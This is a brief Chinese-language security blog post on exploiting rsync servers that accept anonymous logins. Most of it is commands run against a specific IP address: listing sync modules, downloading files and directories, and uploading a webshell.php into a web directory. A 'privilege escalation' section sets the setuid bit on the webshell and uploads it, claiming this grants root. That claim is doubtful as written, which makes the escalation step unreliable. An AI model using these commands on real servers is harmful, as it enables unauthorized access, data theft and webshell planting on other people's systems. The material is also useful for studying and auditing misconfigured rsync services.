记Rsync未授权利用

  • A+
所属分类:安全博客
摘要

RsyncrsyncRsync利用 Rsync(remote synchronize)是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。

RsyncrsyncRsync利用

前言

Rsync(remote synchronize)是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。

rsync是用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,而且可以通过ssh方式来传输文件,提高其保密性。

利用

rsync默认允许匿名访问,若未添加用户口令则可以进行匿名登录。 建议对rsync的IP访问进行限制以防止在用户口令被猜解或泄露时造成损失。

rsync 222.53.16.4.:: #列出同步目录 rsync 222.53.16.4::www/ #列出同步目录中的www目录 rsync -avz 222.53.16.4::www/test.php /root #下载文件到本地 rsync -avz 222.53.16.4::www/ /var/tmp #下载目录到本地 rsync -avz webshell.php 222.53.16.4::www/ #上传本地文件到rsync服务器 

利用rsync提权

rsync进程默认以root权限启动,利用rsync同步文件的同时,可以保持原来文件的权限的特性,可以使用rsync进行提权。

chmod a+s webshell.php rsync -avz webshell.php 222.53.16.4::www/ 

来源:http://www.safe6.cn/

本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

记Rsync未授权利用

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2019-10-10

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: